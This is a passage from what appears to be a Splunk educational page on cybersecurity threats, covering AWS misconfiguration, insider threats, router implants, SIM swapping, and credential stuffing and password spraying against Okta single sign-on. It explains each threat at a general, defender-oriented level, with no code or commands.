What makes this particular vulnerability unique is that an attacker needs physical access to a victim’s computer in order to exploit its multiple flaws. So this attack either comes from the inside, or from hackers who have gained access to a lost or stolen laptop or computer system. Another attack scenario includes a post-malware infection that could be perpetrated by a remote adversary, but with pre-existing access to the targeted system, likely via a prior malware exploit.


Privilege escalation

Amazon Web Services (AWS) Attacks

What you need to know: Amazon's "shared responsibility" model says AWS is responsible for the environment outside of the virtual machine but the customer is responsible for the security inside of the S3 container.

This means threats that take advantage of vulnerabilities created by misconfigurations and deployment errors have become a bigger problem as companies have adopted cloud technologies rapidly and the organization using AWS is responsible for securing their environment. The problem is there are more threats that AWS customers have to worry about.

An attack on an AWS instance can happen in a number of ways. The accelerated shift to the cloud brought on by the global COVID-19 pandemic increased the number of threats for cloud providers. 


It’s important to stay vigilant for activities that may be as simple as suspicious behavior inside of an AWS environment. Other activities to look out for are S3 access from unfamiliar locations and by unfamiliar users.


It’s also important to monitor and control who has access to an organization’s AWS infrastructure. Detecting suspicious logins to AWS infrastructure provides a good starting point for investigations. Actions, such as abusive behaviors caused by compromised credentials, can lead to direct monetary costs because users are billed for any EC2 instances created by the attacker.

Because of the diversity of services being hosted on AWS and the new types of cloud threats being spun up daily, these attacks can virtually come from anywhere and anyone.


Insider Threat 

What you need to know: An insider threat attack is a malicious assault carried out by insiders with authorized access to your bank’s computer system, network and resources. In this assault, attackers often aim to pilfer classified, proprietary or otherwise sensitive information and assets, either for personal gain or to provide information to competitors. They might also try to sabotage your organization with system disruptions that mean loss of productivity, profitability and reputation.

Malicious insiders have a distinct advantage in that they already have authorized access to your company’s network, information and assets. They may have accounts that give them access to critical systems or data, making it easy for them to locate it, circumvent security controls and send it outside of the organization.

Inside attackers can be employees in the organization with bad intentions or cyberspies impersonating contractors, third parties or remote workers. They may work autonomously, or as part of nation-states, crime rings or competing organizations. While they might also be remote third-party suppliers or contractors located all over the world, they usually have some level of legitimate access to the organization’s systems and data.


Router and Infrastructure Security

What you need to know: Router implants have been rare, and are largely believed to be theoretical in nature and use. However, recent vendor advisories indicate that these have been seen in the wild. The initial infection vector does not appear to leverage a zero-day vulnerability. It is believed that the credentials are either default or discovered by the attacker in order to install the backdoor. However, the router's position in the network makes it an ideal target for re-entry or further infection.

Networking devices, such as routers and switches, are often overlooked as resources that attackers will leverage to subvert an enterprise. Attackers compromise network devices and can then obtain direct access to the company's internal infrastructure — effectively increasing the attack surface and accessing private services/data.

Advanced threats actors have shown a proclivity to target these critical assets as a means to siphon and redirect network traffic, flash backdoored operating systems and implement cryptographic weakened algorithms to more easily decrypt network traffic.



What you need to know: SIMjacking (also known as a SIM swap scam, port-out scam, SIM splitting and SIM swapping) is a type of account takeover that generally targets a weakness in two-factor authentication and two-step verification in which the second factor is a text message (SMS) or call placed to a mobile telephone. Simply put, simjacking is when an attacker impersonates a target to a cellular provider in order to steal their cell phone number by having it transferred to a different SIM card (which is already in the hacker’s possession).

A hacker calls the support line for a mobile service provider, pretending to be the target, saying they’ve lost their SIM card. They can verify their identity because they have acquired some amount of the target’s personal information (address, passwords or SSN) through one of the many database hacks in the last decade. The service provider’s employee, having no way of knowing that the person on the other end of the line is not who they say they are, makes the switch. Instantly, that phone number — the key associated with so much of digital life — is under the attacker’s control.

Simjackers are typically looking to extort victims for something of great value — like Bitcoin or other cryptocurrency wallets or high-value social media accounts — or to cause harm to their reputations, as Chuckling Squad did with Jack Dorsey. These hackers can come from anywhere in the world, and can be members of organized groups or solitary actors.


Suspicious Okta Activity

What you need to know: Okta is the leading single sign on (SSO) provider, allowing users to authenticate once to Okta, and from there access a variety of web-based applications. These applications are assigned to users and allow administrators to centrally manage which users are allowed to access which applications. Okta also provides centralized logging to help understand how the applications are used and by whom.

While SSO is a major convenience for users, it also provides attackers with an opportunity. If the attacker can gain access to Okta, they can access a variety of applications.

Once exploited, this vulnerability enables a credential stuffing attack, in which the bad actor acquires usernames and passwords from a variety of sources such as breached websites, phishing attacks and password dump sites. By conducting brute force attacks with the help of automated tools, the adversary tests those credentials at scale against a plethora of websites to see if any logins are successful and gain access to the site. From there, attackers have the ability to launch any number of attacks, including launching phishing or spam campaigns, accessing PII and other sensitive information, and financially draining stolen accounts.


Password spraying attacks, which are essentially brute force attacks, feed numerous usernames into an automated program that attempts to guess associated passwords. As the name implies, it relies on a “spray” technique in the hopes that one of the username/password combinations is correct. And it only takes one.

These attacks can essentially come from anywhere. While it is possible that they can be traced to sophisticated cybercrime networks, they can also be executed by less sophisticated, individual, remote hackers with access to automated tools that can conduct a copious number of brute force attacks at once.

Ready to fight cyber threats with Splunk?

Learn more about the top cybersecurity threat detections with Splunk and MITRE ATT&CK.